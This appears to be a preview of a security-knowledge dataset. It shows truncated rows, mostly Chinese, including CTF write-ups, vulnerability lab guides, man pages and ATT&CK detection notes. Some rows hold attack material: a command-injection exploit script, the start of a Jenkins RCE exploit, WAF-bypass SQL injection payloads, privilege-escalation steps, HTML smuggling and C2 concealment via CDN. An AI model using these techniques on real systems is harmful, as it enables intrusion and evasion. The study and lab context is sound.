text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
# Constructor
### 构造器
利用 Vue 构造函数 ,可以创建一个 VUE ‘应用’
```
var vm = new Vue({
// 选项
})
```
在实例化 Vue 时,需要传入一个选项对象,它可以包含数据、模板、挂载元素、方法、生命周期钩子等选项
#### 选项/DOM
在用 vue-cli 创建的 vue 项目中有下面选项
```js
new Vue({
el: '#app',
router,
template: '<App/>',
components: { App }
})
```
##### el
> 类似于React里的render
- 类型: string | HTMLE... | sec-knowleage |
# 执行 Shellcode
## 介绍
shellcode 是一段用于利用软件漏洞而执行的代码,shellcode 为16进制之机械码,以其经常让攻击者获得 shell 而得名。shellcode 常常使用机器语言编写。 可在暂存器 eip 溢出后,塞入一段可让 CPU 执行的 shellcode 机械码,让电脑可以执行攻击者的任意指令。在编译时关闭 ASLR、NX 、CANARY 选项,这样就可以在输入时把 shellcode 布置在栈中,通过动态调试获得所需要的 padding 溢出到返回地址为输入的 shellcode 地址,这样程序返回后便会执行 shellcode。
### 示例
下面给出一个经典例子,验证程序溢出后... | sec-knowleage |
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.47.3.
.\"*******************************************************************
.\"
.\" This file was generated with po4a. Translate the source file.
.\"
.\"*******************************************************************
.TH CKSUM 1 2020年三月 "GNU coreutils 8.... | sec-knowleage |
# Weblogic SSRF漏洞
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
## 测试环境搭建
编译及启动测试环境
```
docker compose up -d
```
访问`http://your-ip:7001/uddiexplorer/`,无需登录即可查看uddiexplorer应用。
## SSRF漏洞测试
SSRF漏洞存在于`http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp`,我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,... | sec-knowleage |
# Angel (RE, 468 points, 20 solves)
We're given a password-checking binary:
``` c++
int __cdecl sub_80485BF(char *input_str)
{
int result; // eax@2
char v2; // [sp+3h] [bp-15h]@1
int v3; // [sp+4h] [bp-14h]@1
size_t i; // [sp+8h] [bp-10h]@3
v2 = *input_str;
v3 = 0;
if ( strlen(input_str) > 2 )
{
for... | sec-knowleage |
# Biblical
Category: Cryptography
## Description
> xhgvxsmrlm{Yryorxzo_xrksvih_ziv_gsv_yvhg}
## Solution
This is a Biblical cipher and there aren't too many of them. Let's use [Atbash](https://en.wikipedia.org/wiki/Atbash):
> Atbash is a monoalphabetic substitution cipher originally used to encrypt the Hebrew alphabet.... | sec-knowleage |
# Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234)
Django在2019年8月1日发布了一个安全更新,修复了在JSONField、HStoreField两个模型字段中存在的SQL注入漏洞。
参考链接:
- https://www.djangoproject.com/weblog/2019/aug/01/security-releases/
- https://www.leavesongs.com/PENETRATION/django-jsonfield-cve-2019-14234.html
该漏洞需要开发者使用了JSONField/HStoreField,且用户可... | sec-knowleage |
.\" Copyright (c) 1993 Michael Haardt (michael@moria.de), Fri Apr 2 11:32:09 MET DST 1993
.\"
.\" This is free documentation; you can redistribute it and/or
.\" modify it under the terms of the GNU General Public License as
.\" published by the Free Software Foundation; either version 2 of
.\" the License, or (at your... | sec-knowleage |
.\" auto-generated by docbook2man-spec $Revision: 1.1 $
.TH "ALTER FUNCTION" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands"
.SH NAME
ALTER FUNCTION \- 修改一个函数的定义
.SH SYNOPSIS
.sp
.nf
ALTER FUNCTION \fIname\fR ( [ \fItype\fR [, ...] ] ) RENAME TO \fInewname\fR
.sp
.fi
.SH "DESCRIPTION 描述"
.PP
\fBALTER FUNCTI... | sec-knowleage |
rsh
===
连接远程主机并执行命令
## 补充说明
**rsh命令** 用于连接到远程的指定主机并执行指定的命令。
### 语法
```shell
rsh(选项)(参数)
```
### 选项
```shell
-d:使用Socket层级的排错功能;
-l<用户名称>:指定要登入远端主机的用户名称;
-n:把输入的指令号向代号为/dev/null的特殊外围设备。
```
### 参数
* 远程主机:指定要连接的远程主机;
* 指令:指定要在远程主机上执行的命令。 | sec-knowleage |
# pyc反编译
---
**相关文章**
- [py可执行文件反编译教程--exe转换py](https://blog.csdn.net/m0_37552052/article/details/88093427)
- [Python代码保护 | pyc 混淆从入门到工具实现](https://zhuanlan.zhihu.com/p/145811103)
**相关工具**
- [python反编译](https://tool.lu/pyc)
- [rocky/python-uncompyle6](https://github.com/rocky/python-uncompyle6)
```bash
# 例如有一个 ... | sec-knowleage |
# JS and HTML are best friends
Category: Web
## Description
> Part 3 of Imperva's challenge
>
> Put your JavaScript to the test and manipulate the DOM!
>
## Solution
The [previous challenge](Hard_login.md)'s flag has left us with a hint: `the_company_likes_cookies`.
We create an account by entering a desired username... | sec-knowleage |
### 密码安全伪随机数生成器介绍
密码学安全伪随机数生成器(cryptographically secure pseudo-random number generator,CSPRNG),也称为密码学伪随机数生成器(cryptographic pseudo-random number generator,CPRNG),是一种特殊的伪随机数生成器。它需要满足满足一些必要的特性,以便于适合于密码学应用。
密码学的很多方面都需要随机数
- 密钥生成
- 生成初始化向量,IV,用于分组密码的 CBC,CFB,OFB 模式
- nounce,用于防止重放攻击以及分组密码的 CTR 模式等、
- [one-time pads]... | sec-knowleage |
# HTTP
`HTTP` ( `Hyper Text Transfer Protocol` ,也称为超文本传输协议)是一种用于分布式、协作式和超媒体信息系统的应用层协议。 `HTTP` 是万维网的数据通信的基础。
## 例题
> 题目:江苏省领航杯-2017:hack
总体观察可以得出:
- `HTTP`为主
- `192.168.173.134`为主
- 不存在附件
从这张图,基本可以判断初这是一个在`sql注入-盲注时产生的流量包`
到此为止,基本可以判断flag的方向,提取出所有的url后,用`python`辅助即可得到flag
- 提取url: `tshark -r hack.pcap -T fields -e http... | sec-knowleage |
# Writeup DefCamp CTF 2015
Uczestniczyliśmy (msm, Rev, other019, nazywam i Shalom) w DefCamp CTF, i znowu spróbujemy opisać zadania z którymi walczyliśmy (a przynajmniej te, które pokonaliśmy).
Ogólne wrażenia:
Większość zadań wymagała łączenia się przez VPN aby uzyskać dostęp do infrastruktury organizatora. Było to o ... | sec-knowleage |
package org.vulhub.shirodemo;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class ShirodemoApplication {
public static void main(String[] args) {
SpringApplication.run(ShirodemoApplication.class, args)... | sec-knowleage |
xhost
===
制哪些X客户端能够在X服务器上显示
## 补充说明
**xhost命令** 是X服务器的访问控制工具,用来控制哪些X客户端能够在X服务器上显示。该命令必须从有显示连接的机器上运行。可以通过使用`-host`参数,从访问列表中除去一个名称。不要从访问列表中除去当前的名称。如果已经这样做了,请在作出任何更改之前注销系统。
### 语法
```shell
xhost(参数)
```
### 参数
* +:关闭访问控制,允许任何主机访问本地的X服务器;
* -:打开访问控制,仅允许授权清单中的主机访问本地的X服务器。
输入无变量的xhost命令将显示访问X服务器的当前主机名,并显示一条消息表明访问是否已启用。
为了安... | sec-knowleage |
# 恶意流量分析练习
请详见我的另一开源文档:[流量分析练习](https://traffic.y1ng.org/),其中的恶意流量样本主要来源于:[Malware-Traffic-Analysis.net](https://www.malware-traffic-analysis.net/index.html),感谢原作者从13年起就不断整理发布恶意流量分析样本。
相关练习文档:
- [PIZZA-BENDER](https://traffic.y1ng.org/0x1_23-8-2020/)
- [Pcap and alerts for an ISC diary](https://traffic.y1ng.org/0x2... | sec-knowleage |
### 音频隐写相关题目类型
与音频相关的 CTF 题目主要使用了隐写的策略,主要分为 MP3 隐写,LSB 隐写,波形隐写,频谱隐写等等。
### 音频隐写类题目破解常见手段
通过 `binwalk` 以及 `strings` 可以发现的信息不再详述。
### 音频隐写中MP3 隐写原理
MP3隐写主要是使用 [Mp3Stego](http://www.petitcolas.net/steganography/mp3stego/) 工具进行隐写,其基本介绍及使用方法如下
> MP3Stego will hide information in MP3 files during the compression process. The... | sec-knowleage |
## High-speed RSA Keygen (Crypto, 150p)
See the attached files.
Download RSA-Keygen.tar.gz
###ENG
[PL](#pl-version)
We were given a ciphertext, a key generator written in Python and a public key generated by that script - so the challenge
is to decrypt the ciphertext using only the public key.
Looking at the sc... | sec-knowleage |
# Encrypted Pastebin
## [Flag0](./flag0) -- Found
- What are these encrypted links?
- Encodings like base64 often need to be modified for URLs. Thanks, HTTP
- What is stopping you from modifying the data? Not having the key is no excuse
## [Flag1](./flag1) -- Not Found
## [Flag2](./flag2) -- Not Found
## [Flag3](./flag... | sec-knowleage |
import requests
def send(s):
return requests.post("http://smartcat3.insomni.hack/cgi-bin/ping.cgi", data={"dest":s}).text
def send_payload(pay):
p="127.0.0.1<(python<<<\"print'"
p+="%c"*len(pay)
p+="'%("
for c in pay:
p+=str(ord(c))+","
p=p[:-1]+")\">/tmp/p4Rocks)"
send(p)
p="1... | sec-knowleage |
# 59. 滑动窗口的最大值
## 题目链接
[牛客网](https://www.nowcoder.com/practice/1624bc35a45c42c0bc17d17fa0cba788?tpId=13&tqId=11217&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github)
## 题目描述
给定一个数组和滑动窗口的大小,找出所有滑动窗口里数值的最大值。
例如,如果输入数组 {2, 3, 4, 2, 6, 2, 5, 1} 及滑动窗口的大小 3,那么一共存在 6 个滑动窗口,他们的最大值... | sec-knowleage |
# Photo Gallery - FLAG0
## 0x00 Check Image Source
Based on [FLAG1][1], when fetching an image id, it will return an image from the **files** directory.
http://127.0.0.1/xxxxxxxxxx/fetch?id=1
| id | title | parent | filename |
| -- | ---------------- | ------ | ------------------ |
| 1 | Utterly a... | sec-knowleage |
# T1003-003-win-基于应用日志检测Ntdsutil获取凭证
## 来自ATT&CK的描述
攻击者可能试图访问或创建Active Directory域数据库的副本,以便窃取凭据信息,以及获取有关域成员(例如设备,用户和访问权限)的其他信息。默认情况下,NTDS文件(NTDS.dit)位于%SystemRoot%\NTDS\Ntds.dit域控制器中。
除了在活动的域控制器上查找NTDS文件之外,攻击者还可能搜索包含相同或相似信息的备份。
下列工具和技术可用于枚举NTDS文件和整个Active Directory哈希的内容。
- 卷影复制
- secretsdump.py
- 使用内置的Windows工具ntdsutil.... | sec-knowleage |
# 基础
---
## 模板
在 testweb 目录底下创建 templates 目录并建立 ffffffff0x.html 文件
```
├── manage.py
├── templates
│ └── ffffffff0x.html
└── testweb
├── asgi.py
├── __init__.py
├── settings.py
├── urls.py
├── views.py
└── wsgi.py
```
ffffffff0x.html 内容如下
```html
<h1>{{ hello }}</h1>
```
修改 testweb/settings.py... | sec-knowleage |
# Looking glass (web/crypto, 330p, 18 solved)
In the challenge we get access to a go webservice behind some wasm interface.
We can ignore the wasm part and focus solely on the [go part](main.go) and on [protobuf interface](command.proto).
The logic of the application is simple:
1. User can send messages via protobuf
2.... | sec-knowleage |
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5.
.\"*******************************************************************
.\"
.\" This file was generated with po4a. Translate the source file.
.\"
.\"*******************************************************************
.TH BASE32 1 2022年9月 "GNU coreutils 9... | sec-knowleage |
.\" 中文版 Copyright (c) 2000 meaculpa, Laser 和 www.linuxforum.net
.TH IFCONFIG 8 "4 August 1997" "net-tools" "Linux Programmer's Manual"
.SH NAME
ifconfig \- 配置网络接口
.SH 总览
.B "ifconfig [接口]"
.br
.B "ifconfig 接口 [aftype] options | address ..."
.SH 描述
.B ifconfig
用于配置常驻内核的网络接口。它用于在引导成功时设定网络接口。
此后,只在需要调试及系统调整时才使用。
.LP
如没有给... | sec-knowleage |
import numpy as np
import json
from crypto_commons.netcat.netcat_commons import nc, send, receive_until_match
def solve(feats):
return [-1 if feats[i] < 0 else 1 for i in range(len(feats))]
def get_probability(z):
return 1. / (1 + np.exp(-(z)))
def fit(X, feats, target):
y = []
for i in range(0, l... | sec-knowleage |
# 0x00 矛与云盾
由于没有阿里云盾的试验环境,以下操作都在线上测试,总的来说阿里云还是比较不好绕的,因为对于`/**/ /*!*/` 他是强过滤,根本不能用,我们先来测试简单语句
```
and 1=1 拦截
&& 1=1 不拦截
or 1=1 拦截
|| 1=1 不拦截
and 1 不拦截
and 1= 拦截
and = 拦截
and 1> 不拦截
and 1>1 拦截
and 1>a 拦截
and 1>! 不拦截
```
通过简单的测试我们发现,他对 && || 过滤还是不是很严 ,and的话是不让用直接接入=号的,综合一下前面的知识,我们可以想到几个方法。
1. 不用and 和 or
2. 用and 在两边接入干扰字符... | sec-knowleage |
# T1105-win-入口工具转移-ieexec.exe(白名单)
## 来自ATT&CK的描述
攻击者可能会将工具或其他文件从外部系统转移到被攻击的环境中。可以通过命令和控制通道从外部攻击者控制的系统复制文件,用以将工具带入被攻击的网络中,或通过其他工具(如 FTP)的替代协议。 也可以使用 scp、rsync 和 sftp等本地工具在Mac和 Linux上复制文件。
## 测试案例
IEexec.exe应用程序是.NET Framework附带程序,存在于多个系统白名单内。可以将IEExec.exe应用程序用作主机,以运行使用URL启动的其他托管应用程序。
**路径:**
```
- C:\Windows\Microsof... | sec-knowleage |
原文 by 安全客
在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。
## 实验一:利用Linux内核漏洞提权
VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到

获取到低权限SHELL后我们通常做下面几件事
1.检测操作系统的发行版本
2.查看内核版本
3.检测当前用户权限
4.列举Suid文件
5.查看已经安装的包,程序,运行的服务,过期版本的有可能有漏洞
`$... | sec-knowleage |
# BBSCute 1.0.2
> https://download.vulnhub.com/bbs-cute/Cute-v1.0.2.ova.bz2
靶场IP:`192.168.2.10`
扫描对外端口服务
```
┌──(root㉿kali)-[~/Desktop]
└─# nmap -p1-65535 -sV 192.168.2.10
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-05 10:13 EDT
Nmap scan report for 192.168.2.10
Host is up (0.00028s latency).
Not shown: 65530 cl... | sec-knowleage |
.\" 發信人: hendrix.bbs@bbs.mis.cycu.edu.tw (啾...), 信區: Linux
.\" 標 題: printcap man page 中譯
.\" 發信站: 中原資管森林站 (Sun Mar 30 16:55:48 1997)
.\" 轉信站: cis_nctu!news.cis.nctu!news-peer.nctu!news.nctu!spring!News.csie.ncu!F
.\" --
.\"
.TH PRINTCAP 8 "UNIX Programmer's Manual" "4.2 Berkeley Distribution" "May 10, 1991"
.SH NA... | sec-knowleage |
---
title: 箭头函数
---
## 箭头函数
ES6允许使用“箭头”(=>)定义函数。
```
let [函数名] = (参数) => (
返回值
)
```
等同于下面函数
```
function [函数名]([参数]){
return (
返回值
)
}
```
**注意**:箭头函数的参数小括号,一位参数时可以省略小括号。
如果函数执行多条js语句,用**{}**包裹。
如果有返回值使用**return**返回
```
let [函数名] = (参数) => {
js语句;
return (
返回值
)
}
```
如果函数返回对象,用**({})**包裹
```
let [函数名] = (参数)... | sec-knowleage |
# Gatekeeper
RE
## Description:
> It's a media PC! All fully purchased through the online subscription revolution empire "GimmeDa$". The PC has a remote control service running that looks like it'll cause all kinds of problems or that was written by someone who watched too many 1990s movies. You download the binary fro... | sec-knowleage |
.\" Automatically generated by Pod::Man v1.37, Pod::Parser v1.14
.\"
.\" Standard preamble:
.\" ========================================================================
.de Sh \" Subsection heading
.br
.if t .Sp
.ne 5
.PP
\fB\\$1\fR
.PP
..
.de Sp \" Vertical space (when we can't use .PP)
.if t .sp .5v
.if n .sp
..
.de ... | sec-knowleage |
# rsa-pop-quiz
Cryptography, 200 points
## Description:
> Class, take your seats! It's PRIME-time for a quiz...
## Solution:
This challenge is similar to last year's [rsa-madlibs](/2018_picoCTF/rsa-madlibs.md). The same script from last year worked with this challenge after making the following adjustments:
```console... | sec-knowleage |
# 古典密码简介
在古典密码学中,我们主要介绍单表替代密码,多表替代密码,以及一些其它比较有意思的密码。
值得一提的是,在古典密码学中,设计者主要考虑消息的保密性,使得只有相关密钥的人才可以解密密文获得消息的内容,对于消息的完整性和不可否认性则并没有进行太多的考虑。
- 拓展阅读
- [CTF 中那些脑洞大开的编码和加密](http://www.tuicool.com/articles/2E3INnm)
- [古典密码学发展史](http://www.oscca.gov.cn/sca/zxfw/2017-04/24/content_1011709.shtml)
- [古典密码——维基百科](h... | sec-knowleage |
# ICS_CTF 利用
> ICS CTF竞赛内容来自于作者自身打比赛经验,如有不对之处,请各位多多谅解
Exploit是针对某种漏洞提供的多种利用方法,针对某一种漏洞可以有很多利用方法。
针对工控领域,其实目前多见的利用方式:组态利用、通信劫持、Web渗透。
## 组态利用
组态是工控场景的核心,是工控编程与实现功能的核心内容,如果你不太懂组态,请自行学习自动化领域工业控制系统组态的相关书籍。
最好的学习方式是拿到相关的产品说明书,针对说明书上的内容一点一点学习。
组态的利用方法:
1. 强制IO(最管用的一种调试方法)
2. 工程加密与解密(工程加密是PLC一种保护措施,但仍存在被破解的可能)
3. 上载下载(基础概念请自行恶... | sec-knowleage |
.\" @(#)mpg123.1 0.01 21-Apr-1997 OF; from mpg123 archive
.\" Chinese version copyright (c)linuxipy <groove@ustc.edu> , href=http://www.linuxforum.net>www.linuxforum.net 2003.
.\" Chinese version last update on 29-Dec-2003
.\"
.\"
.\" This file may be copied under the conditions described
.\" in the LDP GENERAL PUBLIC ... | sec-knowleage |
# Rot13 (crypto 100)
###ENG
[PL](#pl-version)
We get `3RG{hv1g_f0h_1g_b0h_g0_V0h}` as ciphertext and N=11.
It looks like some substitution cipher working only on letters, so we assume a caesar.
So after running caesar solver on this we get the flag `3DS{th1s_r0t_1s_n0t_s0_H0t}` for shift 11.
###PL version
Dostajemy cip... | sec-knowleage |
##Connect the server (Web/Network, 100p)
```
login.pwn.seccon.jp:10000
```
###PL
[ENG](#eng-version)
Po połączeniu się z serwerem za pomocą nc dostajemy:

Wpisanie dowolnego loginu także nie daje żadnych efektów. Próbowaliśmy podejść do tego zadania z różnych stron, bez efektów. W końcu uznaliśmy, że ... | sec-knowleage |
# Apache Solr RemoteStreaming 文件读取与SSRF漏洞
Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。
参考链接:
- https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ
## 漏洞环境
执行如下命令启动solr 8.8.1:
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8983`即可查看Apache Solr后台。
## 漏洞复现
首先,访问`http://yo... | sec-knowleage |
# Real World CTF Finals 2018
Team: c7f.m0d3, msm, shalom, sasza, gorbak25, cytadela8, des
### Table of contents
* [Flaglab](flaglab) | sec-knowleage |
'\"
'\" Copyright (c) 1993 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: concat.n,v 1.2 2003/11/24 05:09:59... | sec-knowleage |
# HTML Smuggling
## Summary
- [HTML Smuggling](#html-smuggling)
- [Summary](#summary)
- [Description](#description)
- [Executable Storage](#executable-storage)
## Description
HTML Smuggling consists of making a user to navigate to our crafted HTML page which automaticaly download our malicious file.
## Executable... | sec-knowleage |
import numpy as np
import binascii
from keras import *
from keras.layers import *
from keras.callbacks import ModelCheckpoint, Callback
from PIL import Image
import keras
x_train = np.load("X.npy")
y_train = np.load("y.npy")
flag = np.load("flag.npy")
print(x_train)
print(x_train.shape)
print(y_train.shape)
print(... | sec-knowleage |
# CB1
Crypto, 50 points
## Description
> We picked up a new numbers station that's been active in the shortwave bands. We need to figure out how to crack his code.
>
> Here's an example file, crack the cipher and send us the plaintext message.
>
> NOTE: NON-Standard Flag Format
A WAV file was attached.
## Solution
We ... | sec-knowleage |
# T1521-标准加密协议
## 来自ATT&CK描述
攻击者可以明确地使用已知的加密算法来隐藏命令和控制流量,而不是依赖通信协议提供的任何固有保护。尽管使用了加密算法,但如果必要的密钥在恶意软件样本或配置文件中编码生成,这些容易受到逆向分析工程的追踪。
## 缓解措施
这种类型的攻击技术不容易被预防控制所缓解,因为它是基于对系统功能的滥用。
## 检测
由于数据加密是许多合法应用程序的常见做法,并使用标准的编程语言、特定的API,为命令和控制通信加密数据,对用户来说是无法察觉的。
## 参考推荐
MITRE-ATT&CK-T1521
<https://attack.mitre.org/techniques/T1521> | sec-knowleage |
rexec
===
远程执行Linux系统下命令
## 补充说明
**rexec命令** 用于在指定的远程Linux系统主机上执行命令,向远程rexec服务器发出执行命令的请求。
rexec命令通过检查`$HOME/.netrc`文件(包含远程主机上使用的用户名和密码)来提供自动登录的功能。如果没有发现此类项或系统在安全方式下操作(参阅 securetcpip 命令),rexec命令提示输入一个远程主机的有效用户名和密码。这两种情况下,rexec均导致远程系统上的rexecd使用缺省的compat用户登录认证方法。rexecd不会为了备用的认证方法去查找`/etc/security/user`文件。也可以指定`-n`标志到rexec... | sec-knowleage |
# Hard login
Category: Web
## Description
> Part 2 of Imperva's challenge
>
> Do you know SQL? Can you think outside the box? Does WAF scare you?
>
## Solution
The [previous challenge](JS_rocks.md)'s flag has left us with a hint: `can_you_bypass_the_login`.
The description talks about an SQL injection.
So, let's try ... | sec-knowleage |
.\" auto-generated by docbook2man-spec $Revision: 1.1 $
.TH "ABORT" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands"
.SH NAME
ABORT \- 退出当前事务
.SH SYNOPSIS
.sp
.nf
ABORT [ WORK | TRANSACTION ]
.sp
.fi
.SH "DESCRIPTION 描述"
.PP
\fBABORT\fR 回卷当前事务并且废弃所有当前事务中做的更新。 这个命令和 SQL 命令
ROLLBACK [\fBrollback\fR(7)],
的行为完全一... | sec-knowleage |
# T1201-win-密码策略发现
## 来自ATT&CK的描述
用于网络的密码策略是一种强制执行复杂密码的方法,这些密码很难通过暴力猜测或破解。攻击者可以尝试访问有关企业网络中使用的密码策略的详细信息。这将有助于攻击者创建一个通用密码列表,并启动符合策略的字典进行暴力攻击(例如,如果最小密码长度应为8,则不尝试“pass123”等密码;如果锁定设置为6,则不检查每个帐户超过3-4个密码,以免锁定帐户)。
密码策略可以在Windows、Linux和macOS系统上设置和查找。
Windows
- net accounts
- net accounts /domain
Linux
- chage -l
- cat /etc/pam.... | sec-knowleage |
# MpngoDB
> 基于分布式文件存储的数据库
### 简介
- MongoDB:是一个数据库软件,有时候我们简称它叫一个数据库,但是其实一个 MongoDB 运行起来,可以里面同时运行多个数据库
- Database: 数据库。一般做法是,一个项目对应一个数据库
- Collection: 集合。类似于关系型数据库下的表的概念,例如全班同学信息
- Document:文档。一个集合中会包含多个文档(一个文档中存储一个同学的信息)。文档对应关系型数据库中的 记录 这个概念
#### 举个例子
一个项目叫 facebook ,那么我们就建立一个 database 来存储这个项目的所有数据。
一个数据库中,可以创建多个集合,... | sec-knowleage |
## YACS2 - yet another captcha solver (PPC)
###ENG
[PL](#pl-version)
The task looks very similar to the one from last year - we have a captcha recorded in a .wav file.
The captcha contains only numbers.
We are supposed to solve 3000 of them to get the flag.
Apart from that the captcha is distorted by a constant backgro... | sec-knowleage |
# CTR
CTR全称为计数器模式(Counter mode),该模式由 Diffe 和 Hellman 设计。
## 加密
## 解密
## 题目
- 2017 star ctf ssss
- 2017 star ctf ssss2 | sec-knowleage |
# C2 实验
---
## 免责声明
`本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.`
---
## C2隐藏技术
### CDN
**准备**
- 一台 vultr centos7 机器
- 一个域名
- cloudflare 账号
**挂上 cdn**
在域名购买后配置,cf 中的域名解析,在 cf 中配置 A 记录, 记录 IP 为 vps 地址
名称随意,如下
ping 测试
104.21.49.218 是 cf 的IP
**端口限制**
Cloudflare 支持的 HTTP 端口是:
- 80
- 8080
- 8880
- 2052
- 2082
- 2086
... | sec-knowleage |
---
title: Bucket 接管
---
<center><h1>Bucket 接管</h1></center>
---
假如在进行渗透时,发现目标的一个子域显示如下内容
</br>
<img width="800" src="/img/1650005828.png"></br>
通过 cname 记录,可以判断出这是一个 Amazon 的 S3,而且页面显示 NoSuchBucket,说明这个 Bucket 可以接管的,同时 Bucket 的名称在页面中也告诉了我们,为 `test.teamssix.com`
那么我们就直接在 AWS 控制台里创建一个名称为 `test.teamssix.com` 的 Bucket 就可以... | sec-knowleage |
# 第3章 抛传——Web 应用程序漏洞利用
> 译者:[@Snowming](https://github.com/Snowming04)
>
> 校对者:[@鶇](http://wp.blkstone.me)、[@leitbogioro](https://github.com/leitbogioro/)、@哈姆太郎、@匿名jack、[@Victor Zhu](https://zhuzhuuu.com/)

在过去几年中,我们看到了一些严重的、面向外部网络的 Web 攻击。从 Apache Struts 2开发框架漏洞(尽管 [Equifax 公司因 Apache ... | sec-knowleage |
.TH locale 5 "09 Nov 1994" "National Language Support" "Linux用户手册"
.SH NAME
locale \- 地域定义文件的描述
.SH 描述
.B 地域
定义文件含有
.B localedef(1)
命令所需的全部信息.
定义文件由几个小节组成, 一个小节详细地描述地域的一个范畴.
.SH 语法
地域定义文件以一个包含有如下关键字的文件头开头:
.TP
.I <escape_char>
其后所跟字符在文件的其余部分被特别解释为逃逸字符,
逃逸字符缺省为反斜杠(
.B \\\\
).
.TP
.I <comment_char>
后面所跟字符在文件的其余部分要特别解... | sec-knowleage |
## Television (Misc)
tl;dr Frames 231 and 463 contain parts of the flag
We're given a gif file, with what looks like static noise. Let's start by splitting it to png of each frame using imagemagick:
`convert television.gif out.png`
That gave us 463 frames, our first guess was to read the noise as binary and search f... | sec-knowleage |
# T1590-001-收集目标组织网络信息-网络信任关系
## 来自ATT&CK的描述
在入侵受害者之前,攻击者可能会收集受害者网络信任关系的信息。有关网络信任的信息可能包括各种详细信息,包括已连接(并可能提升了的)网络访问权限的第二或第三方组织/域(例如:托管服务提供商,承包商等)。
攻击者可以通过不同的方式收集这些信息,例如通过网络钓鱼诱骗收集。有关网络信任的信息也可以通过在线或其他可访问的数据集(例如:搜索公开技术数据库)暴露给攻击者。收集这些信息可能为如下活动提供可能性:其他形式的侦察活动(例如:主动扫描,或搜索开放网站/域),建立运营资源(例如:获取基础设施或入侵基础设施),或实现初始访问(例如:信任关系)。
## 测试... | sec-knowleage |
---
title: Vim
date: 2020-11-25 18:28:43
background: bg-[#46933f]
tags:
- vi
- text
- editor
- terminal
- shortcut
categories:
- Toolkit
intro: |
A useful collection of [Vim](http://www.vim.org/) 8.2 quick reference cheat sheets to help you learn vim editor faster.
plugins:
- copyCode
-... | sec-knowleage |
# DC1-WalkThrough
---
## 免责声明
`本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.`
---
**靶机地址**
- https://www.vulnhub.com/entry/dc-1,292/
**Description**
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
It was designed to be a challenge for beginners, b... | sec-knowleage |
# Ezchallz (crypto/web, 60 solved, 100p)
In the task we get access to a webpage, where we could register, and we get redirected so a page with some fake flag.
First thing we notice is that registration link is `http://206.189.92.209/ezchallz/?page=register`
So we try some LFI there, and it works, we can do `http://206.... | sec-knowleage |
# Dawn
> https://download.vulnhub.com/sunset/dawn.zip
靶场IP:`192.168.32.20`
扫描对外端口服务
```
┌──(root㉿kali)-[~]
└─# nmap -sV -p1-65535 192.168.32.20
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-13 23:11 EDT
Nmap scan report for 192.168.32.20
Host is up (0.000092s latency).
Not shown: 65531 closed tcp ports (reset)
POR... | sec-knowleage |
# Notes
* Category: Cloud
* 200 Points
* Solved by the JCTF Team
## Description
> I made an application that you can store your notes!
>
> Browse and feel free to use it for your purpose :)
## Solution
We visit the attached website and find a react-based note-keeping application.
It has a text box for providing notes,... | sec-knowleage |
.\" -*- nroff -*-
.TH CHATTR 1 "1999年11月" "E2fsprogs version 1.18"
.SH NAME(名称)
chattr \- 修改 Linux 文件系统中的文件属性
.SH SYNOPSIS(总览)
.B chattr
[
.B \-RVf
]
[
.B \-v
.I 版本
]
[
.B \-p
.I project
]
[
.I mode
]
.I files...
.SH DESCRIPTION(描述)
.B chattr
修改文件在 Linux 文件系统中的特有属性。
.PP
符号模式有 +-=[aAcCdDeijsStTu] 几种格式.
.PP
操作符`+'用来在文件已有... | sec-knowleage |
# T1555-005-win-常见凭据存放位置
## 来自ATT&CK的描述
攻击者可能从第三方密码管理器中获取用户凭证。密码管理器是存储用户凭证的应用程序,通常是在一个加密的数据库中。在用户提供主密码解锁数据库后,通常可以获得凭证。数据库被解锁后,这些凭证可以被复制到内存中。这些数据库可以以文件形式存储在磁盘上。
攻击者可以通过从内存中提取主密码或纯文本凭证,从密码管理器中获取用户凭证。攻击者可以通过密码猜解获得主密码从内存提取凭证。
## 测试案例
navicat
```yml
MySQL:HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\<your connect... | sec-knowleage |
#! /usr/bin/env python2
#Jenkins Groovy XML RCE (CVE-2016-0792)
#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
#Made with <3 by @byt3bl33d3r
from __future__ import print_function
import requests
from requests.packages.urllib3.exceptions imp... | sec-knowleage |
# PyExp
> https://download.vulnhub.com/pyexp/pyexpvm.zip
靶场IP地址:`192.168.2.137`
扫描对外端口服务
```
┌──(root💀kali)-[/tmp]
└─# nmap -p1-65535 -sV 192.168.2.137 ... | sec-knowleage |
---
title: ChatGPT
date: 2023-02-09 10:28:43
background: bg-[#4aa181]
tags:
- AI
- OpenAI
- Prompts
- Tips
categories:
- Toolkit
intro: This cheat sheet lists out prompts and tips from all over the world on how to use ChatGPT effectively
plugins:
- copyCode
---
Getting Started
---------------
